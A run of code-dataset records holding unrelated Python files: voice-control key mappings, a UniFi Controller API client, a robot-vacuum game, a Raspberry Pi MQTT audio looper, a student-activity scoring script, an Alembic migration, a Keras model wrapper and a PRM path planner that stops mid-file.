\"edge\" : Key(\"end\"),\n \"left []\" : Key(\"left:%(n)d\"),\n \"right []\" : Key(\"right:%(n)d\"),\n \"hike []\" : Key(\"up:%(n)d\"),\n \"slide []\" : Key(\"down:%(n)d\"),\n \"bonk []\" : Key(\"delete:%(n)d\"),\n \"knock []\" : Key(\"backspace:%(n)d\"),\n \"slap []\" : Key(\"enter:%(n)d\"),\n \"num \" : Text(\"%(big)d\"),\n \"per []\" : Key(\"c-left:%(n)d\"),\n \"pro []\" : Key(\"c-right:%(n)d\"),\n \"chip []\" : Key(\"c-backspace:%(n)d\"),\n \"pitch []\" : Key(\"c-delete:%(n)d\"),\n \"top side\" : Key(\"c-home\"),\n \"bottom\" : Key(\"c-end\"),\n \"save file\" : Key(\"c-s\"),\n \"open file\" : Key(\"c-o\"),\n \"new file\" : Key(\"c-n\"),\n\n # Also in the emacs rules, but since emacs rules are mutually exclusive with these\n # both definition should never be active at the same time.\n \"view \" : CharCmd(\"(md-select-window-with-glyph %s)\"),\n}\n\n_extras = [\n Integer(\"n\", 3, 100),\n Integer(\"i\", 3, 8),\n Integer(\"big\", 0, 2**14),\n]\n\n_defaults = {\n \"search_terms\" : \"\",\n \"n\": 1,\n \"i\": 1,\n}\n\nCUARule = makeContextualRule(\"CUA\", _mapping, _extras, _defaults)\nCUARule.context.addRequirement(NotEmacs)\nCUARule.context.addRequirement(NotTerminal)\n","sub_path":"rules/CUA.py","file_name":"CUA.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"250807756","text":"from requests import Session\nimport json\nimport re\nfrom typing import Pattern, Dict, Union\n\n\nclass LoggedInException(Exception):\n\n def __init__(self, *args, **kwargs):\n super(LoggedInException, self).__init__(*args, **kwargs)\n\n\nclass API(object):\n \"\"\"\n Unifi API for the Unifi Controller.\n\n \"\"\"\n _login_data = {}\n _current_status_code = None\n\n def __init__(self, username: str=\"ubnt\", password: str=\"ubnt\", site: str=\"default\", baseurl: str=\"https://unifi:8443\", verify_ssl: bool=True):\n \"\"\"\n Initiates tha api with default settings if none other are set.\n\n :param username: username for the controller user\n :param password: password for the controller user\n :param site: which site to connect to (Not the name you've given the site, but the url-defined name)\n :param baseurl: where the controller is located\n :param verify_ssl: Check if certificate is valid or not, throws warning if set to False\n \"\"\"\n self._login_data['username'] = username\n self._login_data['password'] = password\n self._site = site\n self._verify_ssl = verify_ssl\n self._baseurl = baseurl\n self._session = Session()\n\n def __enter__(self):\n \"\"\"\n Contextmanager entry handle.\n\n :return: instance object of class\n \"\"\"\n self.login()\n return self\n\n def __exit__(self, *args):\n \"\"\"\n Contextmanager exit handle.\n\n :return: None\n \"\"\"\n self.logout()\n\n def login(self):\n \"\"\"\n Log the user in.\n\n :return: None\n \"\"\"\n self._current_status_code = self._session.post(\"{}/api/login\".format(self._baseurl), data=json.dumps(self._login_data), verify=self._verify_ssl).status_code\n if self._current_status_code == 400:\n raise LoggedInException(\"Failed to log in to api with provided credentials\")\n\n def logout(self):\n \"\"\"\n Log the user out.\n\n :return: None\n \"\"\"\n self._session.get(\"{}/logout\".format(self._baseurl))\n self._session.close()\n\n def list_clients(self, filters: Dict[str, Union[str, Pattern]]=None, order_by: str=None) -> list:\n \"\"\"\n List all available clients from the api.\n\n :param filters: dict of k/v pairs; string is compiled to regex\n :param order_by: order by a key; defaults to '_id'\n :return: A list of clients on the format of a dict\n \"\"\"\n\n r = self._session.get(\"{}/api/s/{}/stat/sta\".format(self._baseurl, self._site, verify=self._verify_ssl), data=\"json={}\")\n self._current_status_code = r.status_code\n\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n if filters:\n for term, value in filters.items():\n value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n if order_by:\n data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n return data\n\n def health(self) -> dict:\n \"\"\"\n List site health information.\n :return: A dict of network health information (see below)\n num_adopted\n num_ap \n num_disabled\n num_disconnected\n num_guest\n num_iot\n num_pending\n num_user\n rx_bytes-r\n status\n subsystem\n tx_bytes-r\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/health\".format(self._baseurl, self._site, verify=False), data=\"json={}\")\n self._current_status_code = r.status_code\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n return data[0]\n\n def info(self) -> dict:\n \"\"\"\n List site information.\n :return: A dict of site information (see below for a sample)\n autobackup\n build\n cloudkey_update_version\n cloudkey_version\n data_retention_days\n debug_system\n eol_pending_device_count\n hostname\n https_port\n inform_port\n ip_addrs\n name\n timezone\n unifi_go_enabled\n update_available\n version\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/sysinfo\".format(self._baseurl, self._site, verify=False), data=\"json={}\")\n self._current_status_code = r.status_code\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n return data[0]\n\n def events(self, filters: Dict[str, Union[str, Pattern]]=None, order_by: str=None) -> list:\n \"\"\"\n List site events.\n\n :param filters: dict of k/v pairs; string is compiled to regex\n :param order_by: order by a key; defaults to '_id'\n :return: A list of events as dicts (see below for sample keys)\n app_proto\n datetime\n dest_ip\n dest_port\n event_type\n host\n key\n msg\n proto\n site_id\n src_ip\n src_mac\n src_port\n srcipCountry\n subsystem\n time\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/event\".format(self._baseurl, self._site, verify=self._verify_ssl), data=\"json={}\")\n self._current_status_code = r.status_code\n\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n if filters:\n for term, value in filters.items():\n value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n if order_by:\n data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n return data\n\n def routes(self, filters: Dict[str, Union[str, Pattern]]=None, order_by: str=None) -> list:\n \"\"\"\n List site routes.\n\n :param filters: dict of k/v pairs; string is compiled to regex\n :param order_by: order by a key; defaults to '_id'\n :return: A list of routes as dicts (see below for example data)\n nh: [{'intf': 'eth0',\n 't': 'C>*'\n }]\n pfx: 192.168.1.0/24\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/routing\".format(self._baseurl, self._site, verify=self._verify_ssl), data=\"json={}\")\n self._current_status_code = r.status_code\n\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n if filters:\n for term, value in filters.items():\n value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n if order_by:\n data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n return data\n","sub_path":"ubiquiti/unifi.py","file_name":"unifi.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"247492654","text":"from pgu import gui\nfrom TurboVacuum.Plansza import board\nfrom TurboVacuum import Plansza\nfrom DecisionTree import DecisionTree as t\nfrom NeuralNetwork import imageAnalyzer as iA\nfrom TurboVacuum.Plansza import plamy\n\ndt = t.create_tree(\"DecisionTree/samples.csv\", \"wynik\", 7, True)\n\n\nclass Indiana:\n\n indianaImg = gui.Image('Assets/vacuum.png')\n global TODO_MULTIPLIER\n TODO_MULTIPLIER = 64\n global position\n global board\n position = position = board.find_start()\n wymyto = 0\n global iCoordinates\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n\n def __init__(self):\n global board\n global TODO_MULTIPLIER\n position = board.find_start()\n wymyto = 0\n print(position)\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n\n def indianaDraw(self, lo):\n global iCoordinates\n # draws Indiana on coordinates x,y in specified element\n lo.add(self.indianaImg, position[1] * 64, position[0] * 64)\n\n def go_east(self):\n global position\n global TODO_MULTIPLIER\n global board\n if (board.get(board.go_east(position))) != 2:\n position = [position[0], position[1] + 1]\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n print(position)\n print(iCoordinates)\n else:\n print('Nie moge tego zrobic')\n\n def go_west(self):\n global position\n global TODO_MULTIPLIER\n global board\n if board.get(board.go_west(position)) != 2:\n position = [position[0], position[1] - 1]\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n print(position)\n print(iCoordinates)\n else:\n print('Nie moge tego zrobic')\n\n def go_south(self):\n global position\n global TODO_MULTIPLIER\n # global board\n if board.get(board.go_south(position)) != 2:\n position = [position[0] + 1, position[1]]\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n print(position)\n print(iCoordinates)\n else:\n print('Nie moge tego zrobic')\n\n def go_north(self):\n global position\n global TODO_MULTIPLIER\n global board\n if (board.get(board.go_north(position))) != 2:\n position = [position[0] - 1, position[1]]\n iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n print(position)\n print(iCoordinates)\n else:\n print('Nie moge tego zrobic')\n\n def analyze(self):\n global board\n if (board.get(position)) < 10:\n # print(iA.is_dirty('tree.png')\n print(\"Czyste\")\n if (position[0], position[1]) in plamy:\n plamy.remove((position[0], position[1]))\n return iA.is_dirty('Assets/clean01.jpg')\n else:\n # print(\"get posi \" + str(board.get(position)))\n print(dt.predict(self.checkk(board.get(position))))\n\n # print(iA.is_dirty('grass.jpg')\n print(\"Brudne\")\n # dt.predict([[75,0,0]])\n board.board.itemset((position[0], position[1]), 0)\n print((position[0], position[1]))\n plamy.remove((position[0], position[1]))\n board.composeBoard((position[0], position[1]))\n print(plamy)\n self.wymyto = 1\n return str(iA.is_dirty(\"Assets/\" + board.drzewaa()))\n\n # def analyze(self):\n # global board\n # if (board.get(position)) == 1:\n # board.board.itemset((position[0], position[1]), 0)\n # print((position[0], position[1]))\n # plamy.remove((position[0], position[1]))\n # board.composeBoard()\n # print(plamy)\n # self.wymyto = 1\n # return str(iA.is_dirty(\"Assets/\" + board.drzewaa())) + str(dt.predict(board.dirt(position)))\n # else:\n # return iA.is_dirty('Assets/clean01.jpg')\n\n def czyWymyto(self):\n if (self.wymyto == 1):\n self.wymyto = 0\n return True\n else:\n return False\n\n def getPosition(self):\n return position\n\n def checkk(self,ind):\n check = []\n check.append([[20, 0, 50, 30, 10, 34, 30]])\n check.append([[70, 95, 60, 23, 30, 14, 14]])\n check.append([[2, 6, 40, 13, 15, 20, 41]])\n check.append([[50, 10, 50, 25, 30, 40, 49]])\n check.append([[0, 0, 4, 0, 0, 35, 35]])\n check.append([[0,0,50,20,5,40,35]])\n check.append([[50,40,80,23,20,24,20]])\n check.append([[40,50,4,30,20,23,20]])\n check.append([[3,2,70,10,10,15,18]])\n\n if (ind==11):\n return check[0]\n else:\n if (ind == 12):\n return check[1]\n else:\n if (ind == 13):\n return check[2]\n else:\n if (ind == 14):\n return check[3]\n else:\n if (ind == 15):\n return check[4]\n else:\n if (ind == 16):\n return check[5]\n else:\n if (ind == 17):\n return check[6]\n else:\n if (ind == 18):\n return check[7]\n else:\n if (ind == 19):\n return check[8]","sub_path":"TurboVacuum/Indiana.py","file_name":"Indiana.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"308163281","text":"import paho.mqtt.client as mqtt\nimport time\nfrom pydub import AudioSegment\nimport os\nfrom picamera import PiCamera\nimport cv2\nimport numpy as np\n\nsong = AudioSegment.from_file('/home/pi/Desktop/source.3gp')\nsong = song-100\nnum=0\ncamera = PiCamera()\nbutton = [0,0,0,0,0,0,0,0,0]\nsrc = np.zeros((300,300,3),np.uint8)\ncv2.imwrite('/home/pi/Desktop/carmera.jpg',src)\n\ndef camera_capture(n):\n global src\n camera.start_preview()\n time.sleep(1)\n camera.capture('/home/pi/Desktop/carmera{}.jpg'.format(n))\n camera.stop_preview()\n src = cv2.imread('/home/pi/Desktop/carmera.jpg',cv2.IMREAD_COLOR)\n srcn = cv2.imread('/home/pi/Desktop/carmera{}.jpg'.format(n),cv2.IMREAD_COLOR)\n srcn = cv2.resize(srcn,dsize=(100,100),interpolation=cv2.INTER_AREA)\n r, c = (n-1)/3, (n-1)%3\n roi = src[int(r*100):int((r+1)*100),int(c*100):int((c+1)*100),:]\n roi[:,:,:]=srcn[:,:,:]\n cv2.imwrite('/home/pi/Desktop/carmera.jpg',src)\n \ndef display_image():\n pass\n\ndef on_connect(client,userdata,flags,rc):\n client.subscribe(\"SOURCE\")\n \ndef on_message(client,userdata,msg):\n global song\n global num\n num+=1\n print(\"message arrive\")\n fw=open('temp.3gp','wb')\n #fw=open('source.3gp','wb')\n fw.write(msg.payload)\n fw.close()\n \n data = AudioSegment.from_file('/home/pi/Desktop/temp.3gp',formet='arm')\n song = song.overlay(data*2)\n song.export('/home/pi/Desktop/source.3gp')\n fr=open('source.3gp','rb')\n sendData = fr.read()\n fr.close()\n mqttClient.publish(\"CTRL-SPEAKER\",sendData)\n #mqttClient.publish(\"CTRL-SPEAKER\",msg.payload)\n\ndef mikeOn():\n print(\"MIKE ON\")\n mqttClient.publish(\"CTRL-MIKE\",\"MIKE ON\")\n\ndef mikeOff():\n print(\"MIKE OFF\")\n mqttClient.publish(\"CTRL-MIKE\",\"MIKE OFF\")\n\ndef recordOn(n,led):\n mikeOn()\n ledInput = bytes([led])\n os.write(writeLed,ledInput)\n stepInput = bytes([1, 0, 255])\n os.write(writeStep,stepInput)\n camera_capture(n)\n #display_image()\n time.sleep(1)\n\ndef recordOff():\n mikeOff()\n ledInput=bytes([0])\n os.write(writeLed,ledInput)\n stepInput = bytes([0, 0, 255])\n os.write(writeStep,stepInput)\n time.sleep(1)\n \nmqttClient = mqtt.Client(\"LoopStation\")\nmqttClient.on_connect=on_connect\nmqttClient.on_message = on_message\nmqttClient.connect(\"localhost\",1883)\n\nmqttClient.loop_start()\n\nbutton = bytearray(button)\nwaitEnd = 0\nprint('start')\nreadBtn = os.open('/dev/fpga_push_switch',os.O_RDONLY)\nwriteStep = os.open('/dev/fpga_step_motor',os.O_WRONLY)\nwriteLed = os.open('/dev/fpga_led',os.O_WRONLY)\n\nret = os.read(readBtn,9)\nprint(ret[0])\nledInput = bytes([0])\nstepInput = bytes([1, 0, 255])\nwhile True:\n ret = os.read(readBtn,9)\n print(ret)\n sleep(1)\n if waitEnd==0:\n if(ret[0]==1):\n recordOn(1,128)\n waitEnd = 1\n elif (ret[1]==1):\n recordOn(2,64)\n waitEnd = 2\n elif (ret[2]==1):\n recordOn(3,32)\n waitEnd = 3\n elif (ret[3]==1):\n recordOn(4,16)\n waitEnd = 4\n elif (ret[4]==1):\n recordOn(5,8)\n waitEnd = 5\n elif (ret[5]==1):\n recordOn(6,4)\n waitEnd = 6\n elif (ret[6]==1):\n recordOn(7,2)\n waitEnd = 7\n elif (ret[7]==1):\n recordOn(8,1)\n waitEnd = 8\n else:\n if(ret[0]==1)and(waitEnd==1):\n waitEnd = 0\n recordOff()\n if(ret[1]==1)and(waitEnd==2):\n waitEnd = 0\n recordOff()\n if(ret[2]==1)and(waitEnd==3):\n waitEnd = 0\n recordOff()\n if(ret[3]==1)and(waitEnd==4):\n waitEnd = 0\n recordOff()\n if(ret[4]==1)and(waitEnd==5):\n waitEnd = 0\n recordOff()\n if(ret[5]==1)and(waitEnd==6):\n waitEnd = 0\n recordOff()\n if(ret[6]==1)and(waitEnd==7):\n waitEnd = 0\n recordOff()\n if(ret[7]==1)and(waitEnd==8):\n waitEnd = 0\n recordOff()","sub_path":"Loop2.py","file_name":"Loop2.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"445007965","text":"from oedm.student_activity import ActivityModel\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndata = pd.read_csv(\"test_data/data_process_result.csv\", header=0, index_col=0, encoding='utf-8')\ndata['LOG_DURATION'] = data['LOG_DURATION'].values*60\n\n# 数据按月份分隔\nmonth_datas = [data[data.DT_MONTH == '2017-03-01'],\n data[data.DT_MONTH == '2017-04-01'],\n data[data.DT_MONTH == '2017-05-01'],\n data[data.DT_MONTH == '2017-06-01'],\n data[data.DT_MONTH == '2017-07-01']]\nmonth_datas = [month_data.drop(['DT_MONTH'], axis=1) for month_data in month_datas]\n\n# 取所有学生的并集 使每份数据中学生的学号一致\nstu_code = month_datas[0].index.tolist()\nfor i in range(1, len(month_datas)):\n stu_code = [code for code in stu_code if code in month_datas[i].index.tolist()]\nmonth_datas = [month_data.loc[stu_code] for month_data in month_datas]\n\n# 计算积极度\nactivity_score = [450]*len(month_datas[0])\nmax_score = [450]\nmodle = ActivityModel()\nmonth_num = 0\nfor i in range(24):\n activity_score = modle.calc_activity(month_datas[month_num], activity_score)\n max_score.append(np.max(activity_score))\n if month_num < len(month_datas)-1:\n month_num += 1\n else:\n month_num = 0\n\n# 输出积极度区间及比例\nmax_value = np.max(activity_score)\nmin_value = 350\ninterval = [min_value+i*(max_value-min_value)/5 for i in range(6)]\nprint(interval)\nratio = [0]*5\nfor num in activity_score:\n for i in range(len(ratio)):\n if num >= interval[i] and num < interval[i+1]:\n ratio[i] += 1\nprint(np.array(ratio))\nprint(np.array(ratio)/len(activity_score)*100)\n# 展示最大值的积极度变化情况\n# fig1, ax1 = plt.subplots()\n# ax1.scatter(range(len(max_score)), max_score)\n# # fig2, ax2 = plt.subplots()\n# # ax2.scatter(range(len(activity_score)), np.sort(activity_score, kind='quicksort'))\n# plt.show()\n\nzero_num = 0\nfor i in activity_score:\n if i == 450:\n zero_num += 1\nprint(zero_num)\n\n\n\n\n","sub_path":"test_sep.py","file_name":"test_sep.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"452053988","text":"\"\"\"empty message\n\nRevision ID: 53c115307898\nRevises: a63c22791672\nCreate Date: 2021-10-03 17:13:12.567837\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '53c115307898'\ndown_revision = 'a63c22791672'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('learner',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('birthday_date', sa.DateTime(), nullable=True),\n sa.Column('phone_number', sqlalchemy_utils.types.phone_number.PhoneNumberType(length=20), nullable=True),\n sa.Column('height', sa.Integer(), nullable=True),\n sa.Column('weight', sa.Integer(), nullable=True),\n sa.Column('gender_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('trainer',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('birthday_date', sa.DateTime(), nullable=True),\n sa.Column('phone_number', sqlalchemy_utils.types.phone_number.PhoneNumberType(length=20), nullable=True),\n sa.Column('biography', sa.String(length=500), nullable=True),\n sa.Column('register', sa.Boolean(), nullable=True),\n sa.Column('gender_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('biography')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('trainer')\n op.drop_table('learner')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/53c115307898_.py","file_name":"53c115307898_.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316445311","text":"from tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import metrics\nfrom tensorflow.keras import optimizers\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass krmodel(object):\n \"\"\"this class defines the typical interface and steps of a tfmodel\"\"\"\n model = []\n\n def fit_in_memory(self, train_data, train_labels, validation_data = [], validation_labels = [], num_epochs = 10, minibatch_size = 128):\n self.model = self.create_model(train_data.shape[1:], target_dim = train_labels.shape[1:])\n self.model = self.compile(self.model)\n\n history = self.model.fit(train_data, train_labels, epochs = num_epochs, batch_size = minibatch_size, validation_data = (validation_data, validation_labels))\n #self.plot_history(history.history)\n return self.model, history.history\n\n def plot_history(self, histories):\n history = {'loss':[x['loss'] for x in histories], 'val_loss':[x['val_loss'] for x in histories]}\n history['loss'] = np.mean(history['loss'], axis = 0)\n history['val_loss'] = np.mean(history['val_loss'], axis = 0)\n\n epochs = range(1, len(history['loss']) + 1)\n plt.plot(epochs, history['loss'], 'bo', label = 'training loss')\n plt.plot(epochs, history['val_loss'], 'b', label = 'validation loss')\n plt.title('loss')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n\n plt.show()\n \n \n def create_model(self, feature_shape, target_dim):\n self.model = models.Sequential()\n self.model.add(layers.Dense(512, activation='relu', input_shape=feature_shape))\n self.model.add(layers.Dense(target_dim[0], activation='softmax'))\n return self.model\n\n def compile(self, model):\n model.compile(optimizer = optimizers.RMSprop(lr=0.001),\n loss = losses.categorical_crossentropy,\n metrics=[metrics.categorical_accuracy])\n return model","sub_path":"wheel/wheel/krmodels/krmodel.py","file_name":"krmodel.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120071746","text":"import matplotlib.pyplot as plt \nimport numpy as np \nfrom scipy import spatial \n# https://www.geeksforgeeks.org/union-find/\nfrom networkx.utils import UnionFind \nfrom shapely.geometry import Point, LineString, Polygon, \\\n MultiPolygon\nimport random\nimport copy \nfrom graph import Graph\nfrom workspaces import config\nimport yaml\nimport itertools\nfrom timeit import default_timer as timer\nimport pandas as pd \nimport seaborn as sns\nimport os\n\nWORKSPACE_CONFIG = config()\n\nclass PRM:\n\n def __init__(self, name = None, n = None, r = None, smoothing = None):\n with open(name, 'r') as stream:\n configData = yaml.load(stream, Loader=yaml.Loader)\n\n # self.n = configData['n']\n # self.r = configData['r']\n # self.usePathSmoothing = [False, True]\n self.n = n\n self.r = r\n self.usePathSmoothing = smoothing\n self.minBounds = configData['minBounds']\n self.maxBounds = configData['maxBounds']\n self.iterations = 1000\n\n def check_for_obs_collission(self, startState, goalState):\n\n start = tuple(startState.flatten())\n goal = tuple(goalState.flatten())\n\n line = LineString([start, goal])\n\n obstacles = WORKSPACE_CONFIG['WO2']\n \n collide_flag = False\n for obstacle in obstacles:\n if obstacle.intersects(line):\n\n collide_flag = True\n\n return collide_flag\n\n\n def checkConnectivity(self, data_structure, currLabel, nbrLabel):\n\n currComponent = data_structure[currLabel]\n newComponent = data_structure[nbrLabel]\n\n flag = (currComponent != newComponent)\n return flag \n\n def admissible_heuristic_dist(self, point, dest, distNorm=2):\n p1 = np.reshape(point, (len(point), 1))\n p2 = np.reshape(dest, (len(dest), 1))\n\n distance = np.linalg.norm(p2 - p1, ord=distNorm)\n\n return distance\n\n def smoothPathInGraph(self, graph, path, goal_node_idx, pathLength,\n shouldBenchmark):\n\n developed_path = copy.deepcopy(path)\n\n numEdgesToSmooth = round(len(developed_path) / 5)\n\n for i in range(0, numEdgesToSmooth):\n\n # only allow sampling from the middle of the path\n rNodes = tuple(self.replace_sample(developed_path[1:-1], 2))\n start_node_idx = rNodes[0]\n end_node_idx = rNodes[1]\n\n # skip the sampled nodes if they're already directly connected\n nodeBeforeEnd = graph.getter_helper(end_node_idx, 'prev')\n if nodeBeforeEnd == start_node_idx:\n continue\n\n # obtain the collision free samples\n startNodePos = graph.getter_helper(start_node_idx, 'pos')\n endNodePos = graph.getter_helper(end_node_idx, 'pos')\n\n collided = True\n itr = 0\n flag = False\n\n while collided and itr <= self.iterations:\n\n potentialSample = np.random.uniform(low=self.minBounds, high=self.maxBounds, size=(1, len(self.minBounds)))\n potentialSample = potentialSample.flatten()\n\n collided = self.check_for_obs_collission(startNodePos, potentialSample)\\\n or self.check_for_obs_collission(potentialSample, endNodePos)\n\n itr += 1\n\n if not collided:\n flag = True\n\n if not flag:\n continue\n\n # add the node to the PRM graph\n new_node_idx = goal_node_idx + i + 1\n goal_node_pos = graph.getter_helper(goal_node_idx, 'pos')\n updated_heuristic = self.admissible_heuristic_dist(potentialSample, goal_node_pos)\n graph.add_node(new_node_idx,\n heuristic=updated_heuristic,\n prev=start_node_idx,\n dist=0, priority=0, pos=potentialSample)\n\n # connect it to the graph\n graph.add_edge(start_node_idx, new_node_idx, weight=self.admissible_heuristic_dist(startNodePos, potentialSample))\n\n graph.add_edge(new_node_idx, end_node_idx, weight=self.admissible_heuristic_dist(potentialSample, endNodePos))\n\n # remove in-between nodes on the path\n currNode = end_node_idx\n prev_node = graph.getter_helper(currNode, 'prev')\n\n while prev_node != start_node_idx:\n\n prevPrevNode = graph.getter_helper(prev_node, 'prev')\n developed_path.remove(prev_node)\n\n # need to update prev now in order to continue proper traversal\n graph.setter_helper(currNode, 'prev', prevPrevNode)\n\n # now set the linked list pointers\n prev_node = graph.getter_helper(prev_node, 'prev')\n\n # now insert the new node into its place\n endNodeIDX = developed_path.index(end_node_idx)\n developed_path.insert(endNodeIDX, new_node_idx)\n graph.setter_helper(end_node_idx, 'prev', new_node_idx)\n\n # compute new path length\n newPathEdges = graph.getPathEdges(developed_path)\n newPathLength = 0\n for edge in newPathEdges:\n newPathLength += graph.edges[edge]['weight']\n\n # only return the smoothed path if its shorter\n if newPathLength > pathLength:\n\n if not shouldBenchmark:\n print('smoothing failed, using unsmoothed path')\n\n return path, pathLength\n\n else:\n\n return developed_path, newPathLength\n\n def replace_sample(self, seq, sampleSize):\n\n totalElems = len(seq)\n\n picksRemaining = sampleSize\n for elemsSeen, element in enumerate(seq):\n elemsRemaining = totalElems - elemsSeen\n prob = picksRemaining / elemsRemaining\n if random.random() < prob:\n yield element\n picksRemaining -= 1\n\n def computePRM(self, startState, goalState, n, r, usePathSmoothing,\n shouldBenchmark):\n\n routes = []\n\n samples = np.random.uniform(low=self.minBounds, high=self.maxBounds,\n size=(n, len(self.minBounds)))\n\n # put them in a K-D tree to allow for easy connectivity queries\n kdTree = spatial.cKDTree(samples)\n\n # add all start, goal, and sampled nodes\n if not shouldBenchmark:\n print('Initializing PRM...')\n\n graph = Graph()\n\n\n # start_node_idx = n + 1\n startState = np.asarray(startState)\n goalState = np.asarray(goalState)\n graph.add_node(n+1,\n heuristic=self.admissible_heuristic_dist(startState, goalState),\n prev=None, dist=0, priority=0, pos=startState.flatten())\n\n # goal_node_idx = n + 2\n graph.add_node(n+2,\n heuristic=0, prev=None, dist=np.inf,\n priority=np.inf, pos=goalState.flatten())\n\n # now initialize the sampled nodes of the underlying PRM graph\n for sample in range(0, n):\n\n pos = samples[sample, :]\n heuristic = self.admissible_heuristic_dist(pos, goalState)\n graph.add_node(sample,\n heuristic=heuristic,\n prev=None, dist=np.inf,\n priority=np.inf, pos=pos.flatten())\n\n (graph, start_node_idx, goal_node_idx) = (graph, n+1, n+2)\n\n # now connect all of the samples within radius r of each other\n if not shouldBenchmark:\n print('Connecting PRM...')\n\n # keep a union-find data structure to improve search performance by not\n # allowing cycles in the graph\n split_graph = UnionFind()\n\n for curr_node_index, curr_node_dat in list(graph.nodes(data=True)):\n\n curr_pos = curr_node_dat['pos']\n\n # search for all nodes in radius of the current node in question\n nbrs = kdTree.query_ball_point(curr_pos.flatten(),r)\n\n # adding all NEW edges that don't collide to the graph\n for nbrIndex in nbrs:\n\n gaol_xy = graph.getter_helper(nbrIndex, 'pos')\n\n collides = self.check_for_obs_collission(curr_pos, gaol_xy)\n check_comp = self.checkConnectivity(split_graph,\n curr_node_index,\n nbrIndex)\n\n if (not collides) and check_comp:\n\n weight = self.admissible_heuristic_dist(curr_pos, gaol_xy)\n graph.add_edge(curr_node_index, nbrIndex,\n weight=weight)\n\n # need to update union-find data with the new edge\n split_graph.union(curr_node_index, nbrIndex)\n\n if not shouldBenchmark:\n print('Finding path through PRM...')\n\n (shortestPath,\n pathLength, _) = graph.get_path(start_node_idx,\n goal_node_idx,\n algo='A star')\n foundPath = (shortestPath is not None)\n\n # only start smoothing if desired\n if foundPath and usePathSmoothing:\n\n if not shouldBenchmark:\n print('Smoothing path found through PRM...')\n\n (shortestPath,\n pathLength) = self.smoothPathInGraph(graph, shortestPath,\n goal_node_idx, pathLength,\n shouldBenchmark)\n\n # run robot through whole path\n if foundPath:\n for node in shortestPath:\n\n currPos = graph.getter_helper(node, 'pos')\n routes.append(currPos)\n # self.robot.updateRobotState(currPos)\n\n return (graph, shortestPath, pathLength, foundPath, routes)\n\n def findPathToGoal(self, startState, goalState, plannerConfigData,\n plotConfigData, shouldBenchmark):\n\n # # allow the user to overide the settings in the config file\n plannerConfigData = None\n\n # n = self.n[0]\n # r = self.r[0]\n # usePathSmoothing = self.usePathSmoothing[0]\n n = self.n\n r = self.r\n usePathSmoothing = self.usePathSmoothing\n\n start = timer()\n (graph,\n shortestPath,\n pathLength, foundPath, routes) = self.computePRM(startState, goalState, n, r,\n usePathSmoothing,\n shouldBenchmark)\n finish = timer()\n computationTime = finish - start\n\n # plot the resulting path 